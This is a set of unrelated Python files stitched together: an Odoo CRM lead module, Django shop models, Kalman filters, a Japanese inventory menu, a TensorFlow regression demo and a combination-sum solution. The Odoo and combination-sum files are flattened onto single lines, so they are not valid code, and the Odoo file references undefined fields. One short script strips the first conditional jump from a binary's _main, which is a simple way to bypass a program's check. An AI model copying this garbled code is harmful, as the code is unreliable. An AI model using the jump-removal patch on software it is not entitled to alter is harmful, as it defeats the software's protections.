# -*- coding: utf-8 -*- from openerp import models, fields, api from openerp.exceptions import except_orm from datetime import datetime from openerp.tools.translate import _ import openerp.addons.decimal_precision as dp class panipat_crm_lead(models.Model): _name = "panipat.crm.lead" _rec_name = 'sequence' _order = 'sequence desc' def _get_custom_company_default(self): value= self.env.user.company_id #print value return value def _get_amount_paid(self): amount_paid=0.0 for rec_self in self: rec_self.total_paid_amount = -1*rec_self.partner_id.credit if rec_self.partner_id and rec_self.partner_id.credit and rec_self.partner_id.credit<=0 else 0.00 def lead_amount_paid_records(self,cr,uid,id,context=None): obj = self.browse(cr,uid,id,context=None) abc=(obj.sequence or '') + (obj.order_group and ':') + (obj.order_group and obj.order_group.name or '') +':'+'ADVANCE (lead)' print "-=-=-=-=-=",abc return { 'view_type': 'form', 'view_mode': 'form', 'res_model': 'account.voucher', 'type': 'ir.actions.act_window', 'context': { 'form_view_ref':'account_voucher.view_vendor_receipt_form', 'default_partner_id': obj.partner_id.parent_id.id if obj.partner_id.parent_id else obj.partner_id.id, 'default_name':abc, 'order_group':obj.order_group.id, 'search_disable_custom_filters': False } } def button_quote(self,cr,uid,id,context=None): lead_obj = self.browse(cr,uid,id,context) values=[] vals={} if context is None:context={} if lead_obj.product_line : for i in lead_obj.product_line : values.append((0,0,{'product_id':i.product_id.id, 'name':i.description or self.pool.get('product.product').name_get(cr,uid,[i.product_id.id],context)[0][1] or "", 'product_uom_qty':i.product_uom_qty, 'product_uom':i.product_uom.id, 'price_unit':i.sale_price, })) vals.update({'order_line':values}) if lead_obj.partner_id and lead_obj.partner_id.id: vals.update({'partner_id':lead_obj.partner_id.id}) vals['order_group'] = lead_obj.order_group.id vals['origin']=lead_obj.sequence 
vals['client_order_ref']=lead_obj.client_order_ref print "---------vals in make_qutaion ==========",vals quotation_id = self.pool.get('sale.order').create(cr,uid,vals,context=None) self.write(cr,uid,id,{'state':'quotation','sale_order':quotation_id},context=None) return { 'name': 'Sale Order Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'sale.order', 'type': 'ir.actions.act_window', 'res_id': quotation_id, } def view_quotation(self,cr,uid,id,context=None): vals = {} obj = self.browse(cr,uid,id,context=None) sale_id = obj.sale_order if sale_id : return { 'name': 'Sale Order Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'sale.order', 'type': 'ir.actions.act_window', 'res_id': sale_id.id, } else : return { 'type': 'ir.actions.client', 'tag': 'action_warn', 'name': 'Warning', 'params': { 'title': 'Warning!', 'text': 'Quotation is not available or has been deleted .', } } def button_install(self,cr,uid,id,context=None): lead_obj = self.browse(cr,uid,id,context) values=[] vals={} vals['customer']=lead_obj.partner_id.id vals['order_group']=lead_obj.order_group.id vals['origin']=lead_obj.sequence if lead_obj.product_line : for i in lead_obj.product_line : values.append((0,0,{'product_id':i.product_id.id, 'name':i.description or self.pool.get('product.product').name_get(cr,uid,[i.product_id.id],context=context)[0][1] or "", 'product_uom':i.product_uom.id, 'product_uom_qty':i.product_uom_qty, })) vals.update({'product_lines':values}) install_id=self.pool.get('panipat.install').create(cr,uid,vals,context=None) self.write(cr,uid,id,{'state':'install','install_id':install_id},context=None) return { 'name': 'Installation Form', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'panipat.install', 'type': 'ir.actions.act_window', 'res_id': install_id, } def view_install_job(self,cr,uid,id,context=None): vals = {} obj=self.browse(cr,uid,id,context=None) install_id = obj.install_id if install_id: return { 'name': 'Installation Form', 'view_type': 
'form', 'view_mode': 'form', 'res_model': 'panipat.install', 'type': 'ir.actions.act_window', 'res_id': obj.install_id.id, } else : return { 'type': 'ir.actions.client', 'tag': 'action_warn', 'name': 'Warning', 'params': { 'title': 'Warning!', 'text': 'Install Job is not available or has been deleted .', } } def button_confirm(self,cr,uid,id,context=None): lead_obj=self.browse(cr,uid,id,context) vals={'state':'confirm'} if lead_obj.sequence in ('draft','/'):vals['sequence']=self.pool.get('ir.sequence').get(cr,uid,'CRM.Lead.Order.No',context) or '/' if not lead_obj.order_group:vals['order_group']=self.pool.get('panipat.order.group').create(cr,uid,{'partner_id':lead_obj.partner_id.id,'created_on':lead_obj.creation_date},context) employee_ids=map(int,self.browse(cr,uid,id).employee_line or []) self.pool.get('panipat.employee.schedule').create_employee_from_schedule(cr,uid,employee_ids,override_vals={'state':'confirm','origin':lead_obj.sequence or '/'},context=context) self.write(cr,uid,id,vals,context=None) if lead_obj.order_group: self.pool.get("panipat.order.group").write(cr,uid,lead_obj.order_group.id,{'custom_company':lead_obj.custom_company.id},context=context) return True def button_to_draft(self,cr,uid,id,context=None): self.write(cr, uid, id, {'state':'draft'}, context) return True def unlink(self,cr,uid,ids,context=None): for id in ids: obj=self.browse(cr, uid, id, context) if obj.state!='cancel': raise except_orm(('Error'),('Cancel the record before deleting it !!')) return super(panipat_crm_lead, self).unlink(cr,uid,ids,context) def button_cancel(self,cr,uid,id,context=None): obj=self.browse(cr, uid, id, context) if obj.install_id: if obj.install_id.state not in ('cancel'): raise except_orm(('Error'),('Cancel the Install Job %s before cancelling this record !!'%(obj.install_id.name_get()[0][1]))) self.pool.get('panipat.install').unlink(cr,uid,obj.install_id.id,context) if obj.sale_order: if obj.sale_order.state not in ('cancel'): 
warning_id=self.pool.get('warning.wizard').create(cr,uid,{'sale_order':obj.sale_order.id},context=context) return { 'name': 'Warning Wizard', 'view_type': 'form', 'view_mode': 'form', 'res_model': 'warning.wizard', 'type': 'ir.actions.act_window', 'res_id': warning_id, 'target':'new', 'context':{'check':'lead','form_view_ref':'panipat_handloom.warning_wizard_sale_view'} } else: self.pool.get('sale.order').unlink(cr,uid,[obj.sale_order.id],context=context) schedule_ids=map(int,obj.employee_line or []) self.pool.get('panipat.employee.schedule').cancel_employee_from_schedule(cr,uid,schedule_ids,context) self.pool.get('panipat.employee.schedule').delete_employee_from_schedule(cr,uid,schedule_ids,context) self.write(cr, uid, id, {'state':'cancel'}, context=context) return True def after_lead_cancel(self,cr,uid,id,context=None): obj=self.browse(cr, uid, id, context) if obj.sale_order: self.pool.get('sale.order').write(cr, uid, obj.sale_order.id,{'order_group':False}, context=context) self.write(cr, uid, id, {'sale_order':False}, context) schedule_ids=map(int,obj.employee_line or []) self.pool.get('panipat.employee.schedule').cancel_employee_from_schedule(cr,uid,schedule_ids,context) self.pool.get('panipat.employee.schedule').delete_employee_from_schedule(cr,uid,schedule_ids,context) self.write(cr, uid, id, {'state':'cancel'}, context=context) return True @api.one @api.depends('partner_id') def _get_partner_details(self): for rec in self: if rec.partner_id: partner = rec.partner_id if partner.parent_id: rec.partner_name = partner.parent_id.name elif partner.is_company: rec.partner_name = partner.name else: rec.partner_name = '' rec.contact_name = partner.name if partner.parent_id else False rec.title = partner.title and partner.title.id or False rec.street = partner.street rec.street2 = partner.street2 rec.city = partner.city rec.state_id = partner.state_id and partner.state_id.id or False rec.country_id = partner.country_id and partner.country_id.id or False 
rec.email_from = partner.email rec.phone = partner.phone rec.mobile = partner.mobile rec.fax = partner.fax rec.zip = partner.zip rec.user_id = partner.user_id and partner.user_id.id or False @api.multi def write(self,vals): print "in write crm.lead self,vals--",self,vals for rec in self: if vals.get('creation_date',False): if rec.order_group: rec.order_group.created_on=vals['creation_date'] return_check = super(panipat_crm_lead, self).write(vals) for rec in self: if rec.state not in ('draft','cancel') and vals.get('employee_line'): rec.employee_line.cancel_employee_from_schedule() rec.employee_line.delete_employee_from_schedule() rec.employee_line.create_employee_from_schedule(override_vals={'state':'confirm','origin':rec.sequence or '/'}) return return_check custom_company=fields.Many2one(comodel_name='res.company',string="Company",required=True,default=_get_custom_company_default) partner_name = fields.Char(compute='_get_partner_details',string="Company Name") partner_id = fields.Many2one('res.partner', 'Partner',track_visibility='onchange', select=True) name = fields.Char(string='Subject', select=1) email_from = fields.Char(compute='_get_partner_details',string='Email', size=128, help="Email address of the contact", select=1) creation_date = fields.Date('Creation Date',required=True,readonly=False) description = fields.Text('Internal Notes') contact_name = fields.Char(compute='_get_partner_details',string='Contact Name', size=64) priority = fields.Selection(selection=[('0', 'Very Low'),('1', 'Low'),('2', 'Normal'),('3', 'High'),('4', 'Very High')], string='Priority', select=True,default='2') user_id = fields.Many2one('hr.employee', 'Salesperson', select=True, track_visibility='onchange') product_line = fields.One2many('panipat.crm.product','crm_lead_id',string="Products",copy=True) employee_line = fields.One2many('panipat.employee.schedule','crm_lead_id',string="Employees for Measurement",copy=True) street = 
fields.Char(compute='_get_partner_details',string='Street') street2 = fields.Char(compute='_get_partner_details',string='Street2') zip = fields.Char(compute='_get_partner_details',string='Zip', change_default=True, size=24) city = fields.Char(compute='_get_partner_details',string='City') state_id = fields.Many2one(compute='_get_partner_details',comodel_name="res.country.state", string='State') country_id = fields.Many2one(compute='_get_partner_details',comodel_name='res.country', string='Country') phone = fields.Char(compute='_get_partner_details',string='Phone') fax = fields.Char(compute='_get_partner_details',string='Fax') mobile = fields.Char(compute='_get_partner_details',string='Mobile') title = fields.Many2one(compute='_get_partner_details',comodel_name='res.partner.title', string='Title') sequence = fields.Char(string="Order No.",copy=False,default='draft') state = fields.Selection(string="State",selection=[('draft','Draft'),('confirm','Confirm'),('quotation','Quotation'),('install','Install'),('cancel','Cancel')],copy=False,default='draft') total_paid_amount =fields.Float(compute='_get_amount_paid',string="Payment",default=00.00) order_group =fields.Many2one('panipat.order.group',string="Order Group",readonly=True,copy=False) sale_order=fields.Many2one(comodel_name="sale.order", string='Quotation',copy=False,readonly=True) install_id=fields.Many2one(comodel_name='panipat.install', string='Install Id',copy=False,readonly=True) client_order_ref=fields.Char('Buyer Order No./Ref', copy=False) class panipat_crm_product(models.Model): _name = "panipat.crm.product" product_id = fields.Many2one('product.product',string="product") crm_lead_id = fields.Many2one('panipat.crm.lead') description = fields.Text(string="Description",required=True) hsn_code=fields.Many2one("hsn.code",string="HSN Code") sequence = fields.Integer(default=10) product_uom_qty=fields.Float(string="Qty",digits_compute= dp.get_precision('Product UoS')) 
product_uom=fields.Many2one(comodel_name='product.uom', string='Unit') sale_price = fields.Float('Unit Sale Price', digits_compute= dp.get_precision('Product Price')) _order='sequence' @api.onchange("product_id") def _onchange_product_id(self): description = self.product_id and self.product_id.name_get()[0][1] or "" #print "------description=====",description self.description = description self.product_uom=self.product_id.uom_id.id try: pricelist=self.pool.get('res.partner').default_get(self._cr, self._uid, ['property_product_pricelist'], context=self._context)['property_product_pricelist'] abc=self.pool.get('sale.order.line').product_id_change(self._cr,self._uid,[],pricelist,self.product_service_id.id,partner_id=self.install_service_id.customer.id,context=self._context) #print "-=-=-abc-==-=",abc self.sale_price=abc['value']['price_unit'] except: self.sale_price=self.product_id.lst_price
from django.db import models
from django.utils.safestring import mark_safe
from image_cropping import ImageRatioField
from easy_thumbnails.files import get_thumbnailer  # NOTE(review): imported but unused in this module

# Create your models here.


class Page(models.Model):
    """A simple static content page."""
    title = models.CharField(max_length=250)
    content = models.TextField()


class Category(models.Model):
    """Product grouping used for catalogue navigation."""
    name = models.CharField(max_length=250)

    def __str__(self):
        return self.name


class Product(models.Model):
    """Catalogue item with an image and an admin-selectable crop region."""
    name = models.CharField(max_length=250)
    content = models.TextField()
    category = models.ForeignKey(Category, on_delete=models.CASCADE, default="", blank=True, null=True)
    image = models.ImageField(upload_to="")
    # Stores the crop rectangle chosen in the admin for a 430x360 rendition.
    cropping = ImageRatioField('image', '430x360')

    @property
    def image_tag(self):
        # Raw <img> markup for admin previews; the URL comes from storage.
        return mark_safe("<img src= '%s' />" % self.image.url)

    def __str__(self):
        return self.name


class Busket(models.Model):
    """A basket entry linking a buyer to a product.

    NOTE(review): "Busket" spelling kept -- renaming the model would
    require a migration and touch existing references.
    """
    name = models.CharField(max_length=100)
    # NOTE(review): max_length has no effect on TextField (only on forms).
    number = models.TextField(max_length=100)
    product = models.ForeignKey(Product, on_delete=models.CASCADE, default="", blank=True, null=True)

    def __str__(self):
        return self.name
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Kalman filter implementation.

1. Bicycle model
2. Unicycle model
"""

import numpy as np
import math


class Filter(object):
    """Common state/covariance/noise plumbing shared by the filters below."""

    def __init__(self, debug=False):
        self.debug = debug
        self._X = None  # state estimate
        self._P = None  # state covariance
        self._Q = None  # process noise covariance
        self._R = None  # measurement noise covariance

    def set_init_state(self, init_state):
        self._X = init_state

    def set_init_covariance(self, init_covariance):
        self._P = init_covariance

    def set_process_noise(self, noise):
        self._Q = noise

    def set_measurement_noise(self, noise):
        self._R = noise

    def is_init_state_set(self):
        """True once an initial state has been supplied."""
        return self._X is not None

    @property
    def X(self):
        return self._X

    @property
    def P(self):
        return self._P


class LinearKalmanFilter(Filter):
    """ simple linear Kalman filter.
    state is [x, y, vel_x, vel_y]
    measurement is [x, y]
    """

    def __init__(self, debug=False):
        super(LinearKalmanFilter, self).__init__(debug)
        self.A = None  # state transition matrix, rebuilt each predict() from delta_t
        self.H = np.array([[1, 0, 0, 0], [0, 1, 0, 0]])  # position-only measurement
        # process noise covariance
        self._Q = np.array([[0.1, 0, 0, 0], [0, 0.1, 0, 0], [0, 0, 0.1, 0], [0, 0, 0, 0.1]])
        # measurement noise covariance
        self._R = np.array([[0.05, 0], [0, 0.05]])
        # initial state covariance
        self._P = np.array([[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]])

    def predict(self, delta_t):
        """Propagate state and covariance forward by delta_t (constant velocity)."""
        assert (self._X is not None)
        self.A = np.array([[1, 0, delta_t, 0], [0, 1, 0, delta_t], [0, 0, 1, 0], [0, 0, 0, 1]])
        self._X = np.dot(self.A, self._X)
        self._P = self.A.dot(self._P).dot(self.A.T) + self._Q
        if self.debug:
            print("delta_t: {}".format(delta_t))

    def correct(self, Z):
        """Fuse a position measurement Z = [x, y] into the state estimate."""
        K = self._P.dot(self.H.T).dot(np.linalg.inv(self.H.dot(self._P).dot(self.H.T) + self._R))
        self._X = self._X + K.dot(Z - self.H.dot(self._X))
        self._P = (np.identity(4) - K.dot(self.H)).dot(self._P)
        if self.debug:
            print("P:\n {}".format(self._P))
            print("X:\n {}".format(self._X))
            print("K:\n {}".format(K))


class BicycleKalmanFilter(Filter):
    """ bicyle EKF
    state is [x, y, yaw, vel, beta], beta is the angle of the current velocity
    of the center of mass with respect to the longitudinal axis of the car
    measurement is [x, y]
    """

    def __init__(self, cm2rear_len=2.0, debug=False):
        super(BicycleKalmanFilter, self).__init__(debug)
        np.set_printoptions(precision=5)
        self.debug = debug
        self.cm2rear_len = cm2rear_len  # distance from center of mass to rear wheel
        self.A = None
        self.H = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])  # position-only measurement
        self._X = None
        # TODO: the non-diagonal element for Q may not be zero
        self._Q = np.array([[1e-7, 0, 0, 0, 0],
                            [0, 1e-7, 0, 0, 0],
                            [0, 0, 1e-7, 0, 0],
                            [0, 0, 0, 1e-3, 0],
                            [0, 0, 0, 0, 1e-2]])
        # self.R = np.array([[0.5, 0], [0, 0.5]])
        # self.R = np.array([[5.0, 0], [0, 5.0]])
        self._R = np.array([[100.0, 0], [0, 100.0]])
        # TODO: the non-diagonal element for P may not be zero
        self._P = np.array([[10.0, 0, 0, 0, 0],
                            [0, 10.0, 0, 0, 0],
                            [0, 0, 10.0, 0, 0],
                            [0, 0, 0, 10.0, 0],
                            [0, 0, 0, 0, 10.0]])
        self.K = None  # last Kalman gain, kept for debugging

    def predict(self, delta_t):
        """EKF prediction: bicycle kinematics with constant vel and beta."""
        assert (self._X is not None)
        # state update
        # X[3] and X[4] are vel and beta. both are kept as constant.
        self._X[0] = self._X[0] + self._X[3] * math.cos(self._X[2] + self._X[4]) * delta_t
        self._X[1] = self._X[1] + self._X[3] * math.sin(self._X[2] + self._X[4]) * delta_t
        self._X[2] = self._X[2] + self._X[3] / self.cm2rear_len * math.sin(self._X[4]) * delta_t
        # compute Jacobian
        # NOTE(review): the Jacobian is evaluated at the *updated* state (the
        # in-place assignments above have already changed X[0..2]); the usual
        # EKF formulation linearises at the prior state -- confirm intent.
        j13 = -delta_t * math.sin(self._X[2] + self._X[4]) * self._X[3]
        j14 = delta_t * math.cos(self.X[2] + self.X[4])
        j15 = -delta_t * math.sin(self.X[2] + self.X[4]) * self.X[3]
        j23 = delta_t * math.cos(self.X[2] + self.X[4]) * self.X[3]
        j24 = delta_t * math.sin(self.X[2] + self.X[4])
        j25 = delta_t * math.cos(self.X[2] + self.X[4]) * self.X[3]
        j34 = delta_t * math.sin(self.X[4]) / self.cm2rear_len
        j35 = delta_t * math.cos(self.X[4]) / self.cm2rear_len * self.X[3]
        jocobian = np.array([[1, 0, j13, j14, j15],
                             [0, 1, j23, j24, j25],
                             [0, 0, 1, j34, j35],
                             [0, 0, 0, 1, 0],
                             [0, 0, 0, 0, 1]])
        # covariance update
        self._P = np.matmul(np.matmul(jocobian, self._P), jocobian.T) + self._Q
        if self.debug:
            print("delta_t: {}".format(delta_t))
            print("P prior:\n {}".format(self._P))
            print("X prior:\n {}".format(self.X))
            print('psi prior {} deg'.format(math.degrees(self.X[2])))
            print('beta prior {} deg'.format(math.degrees(self.X[4])))

    def correct(self, Z):
        """EKF update with a position measurement Z = [x, y]."""
        inv_tmp = np.linalg.inv(np.matmul(np.matmul(self.H, self._P), self.H.T) + self._R)
        self.K = np.matmul(np.matmul(self._P, self.H.T), inv_tmp)
        self._X = self._X + np.matmul(self.K, Z - np.matmul(self.H, self._X))
        self._P = np.matmul(np.identity(5) - np.matmul(self.K, self.H), self._P)
        if self.debug:
            print("P:\n {}".format(self._P))
            print("X:\n {}".format(self._X))
            print("K:\n {}".format(self.K))
            print('psi {} deg'.format(math.degrees(self._X[2])))
            print('beta {} deg'.format(math.degrees(self._X[4])))


class UnicycleKalmanFilter:
    """TODO: WIP, still have bugs"""

    def __init__(self, debug=False):
        # Deliberately unusable: everything below the raise is unreachable
        # scaffolding kept for future work.
        raise NotImplementedError("not implemented yet")
        self.debug = debug
        self.A = None
        self.H = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])
        self.X = np.array([0, 0, 0, 0, 0]).T
        self.X_prior = None
        # TODO: the non-diagonal element for Q may not be zero
        self.Q = np.array(
            [[0.1, 0, 0, 0, 0], [0, 0.1, 0, 0, 0], [0, 0, 0.1, 0, 0], [0, 0, 0, 0.1, 0], [0, 0, 0, 0, 0.5]])
        self.R = np.array([[0.001, 0], [0, 0.001]])
        # TODO: the non-diagonal element for P may not be zero
        self.P = np.array(
            [[1.0, 0, 0, 0, 0], [0, 1.0, 0, 0, 0], [0, 0, 1.0, 0, 0], [0, 0, 0, 1.0, 0], [0, 0, 0, 0, 1.0]])
        self.P_prior = None
        self.K = None

    def predict(self, delta_t):
        self.A = np.array([[1, 0, delta_t * -self.X[3] * math.sin(self.X[2]), delta_t * math.cos(self.X[2]), 0],
                           [0, 1, delta_t * self.X[3] * math.cos(self.X[2]), delta_t * math.sin(self.X[2]), 0],
                           [0, 0, 1, 0, delta_t],
                           [0, 0, 0, 1, 0],
                           [0, 0, 0, 0, 1]])
        self.X_prior = np.dot(self.A, self.X)
        self.P_prior = self.A.dot(self.P).dot(self.A.T) + self.Q
        if self.debug:
            print("delta_t: {}".format(delta_t))

    def correct(self, Z):
        self.K = self.P_prior.dot(self.H.T).dot(np.linalg.inv(self.H.dot(self.P_prior).dot(self.H.T) + self.R))
        self.X = self.X_prior + self.K.dot(Z - self.H.dot(self.X_prior))
        self.P = (np.identity(5) - self.K.dot(self.H)).dot(self.P_prior)
        if self.debug:
            print("P:\n {}".format(self.P))
            print("X:\n {}".format(self.X))
            print("K:\n {}".format(self.K))
import os
from dispatch import *

# Patch the binary 'thing': remove its first conditional jump (jne) in _main,
# write the result to 'patched', and make it executable.
exe = read_executable('thing')
exe.analyze()

main = exe.function_named('_main')

# Locate the first `jne` instruction in _main.
ins = None
for i in main.instructions:
    if i.mnemonic == 'jne':
        ins = i
        break

# NOTE(review): if no `jne` exists, `ins` stays None and this call will be
# handed None -- presumably the binary is known to contain one; verify.
# Replacing with '' appears to NOP the instruction out (dispatch semantics --
# TODO confirm against the library's docs).
exe.replace_instruction(ins, '')
exe.save('patched')
os.system("chmod +x patched")
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Interactive menu for the TFC import-cover (輸入カバー) inventory tool.
from tfc_cover import TfcCover

tc = TfcCover()

menu_line ="""
1)検索コード
2)検索番地
3)ロケーション指示 (output)
4)ロケーション指示 (表示/印刷)
5)更新
6)cover_zaiko.csv 書き出し (在庫報告用)
7)修正データ読み込み(stockフォルダのrevから始まるファイル)
8)保存
9)emptyラック書き出し(data/empty_rack.csv)
10)到着インボイスデータ選択/加工
11)棚卸し用リスト打ち出し(racklist)
"""

# Map each menu choice to the TfcCover action it triggers.
actions = {
    '1': tc.search_code,
    '2': tc.search_banch,
    '3': tc.make_shiji,
    '4': tc.show_shiji,
    '5': tc.make_koshin,
    '6': tc.write_cover_zaiko,
    '7': tc.reload,
    '8': tc.save,
    '9': tc.write_empty,
    '10': tc.write_inv,
    '11': tc.write_rack,
}

ans = ''
while ans != 'q':
    print(menu_line)
    ans = input('メニューを選んでください。(q=終了)')
    handler = actions.get(ans)
    if handler is not None:
        handler()
# Multivariate linear regression with the TensorFlow 1.x graph API
# (placeholders + Session; incompatible with TF 2.x eager mode).
import tensorflow as tf

# Training data: five samples with three features each, and their targets.
x_data = [[10, 20, 30], [40, 50, 15], [25, 35, 45], [55, 13, 23], [33, 43, 53]]
y_data = [[50], [60], [70], [80], [75]]

X = tf.placeholder(tf.float32, shape=[None, 3])  # None = n, i.e. any number of samples
Y = tf.placeholder(tf.float32, shape=[None, 1])

W = tf.Variable(tf.random_normal([3,1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')

# Model: hypothesis = X @ W + b
hypothesis = tf.matmul(X,W) + b

# Mean squared error loss.
cost = tf.reduce_mean(tf.square(hypothesis - Y))

# Plain gradient descent; the small learning rate keeps the un-normalised
# inputs from diverging.
optimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-5)
train = optimizer.minimize(cost)

sess = tf.Session()
sess.run(tf.global_variables_initializer())

# Train for 2001 steps, logging cost and predictions every 10 steps.
for step in range(2001):
    cost_val, hy_val, _ = sess.run([cost, hypothesis, train], feed_dict={X:x_data, Y:y_data})
    if step%10 == 0:
        print(step, "cost : ", cost_val, "\nPrediction : \n", hy_val)
""" 39. Combination Sum Medium 2619 Given a set of candidate numbers (candidates) (without duplicates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target. The same repeated number may be chosen from candidates unlimited number of times. Note: All numbers (including target) will be positive integers. The solution set must not contain duplicate combinations. Example 1: Input: candidates = [2,3,6,7], target = 7, A solution set is: [ [7], [2,2,3] ] Example 2: Input: candidates = [2,3,5], target = 8, A solution set is: [ [2,2,2,2], [2,3,3], [3,5] ] = - list concatenate => [1] + [3, 4] => [1, 3, 4] """ class Solution(object): def combinationSum(self, candidates, target): res = [] self.dfs(candidates, target, 0, [], res) return res def dfs(self, nums, target, index, path, res): if target < 0: return if target == 0: res.append(path) return for i in range(index, len(nums)): self.dfs(nums, target - nums[i], i, path + [nums[i]], res) nums, target = [2, 3, 5], 8 s = Solution() test = s.combinationSum(nums, target) print(test)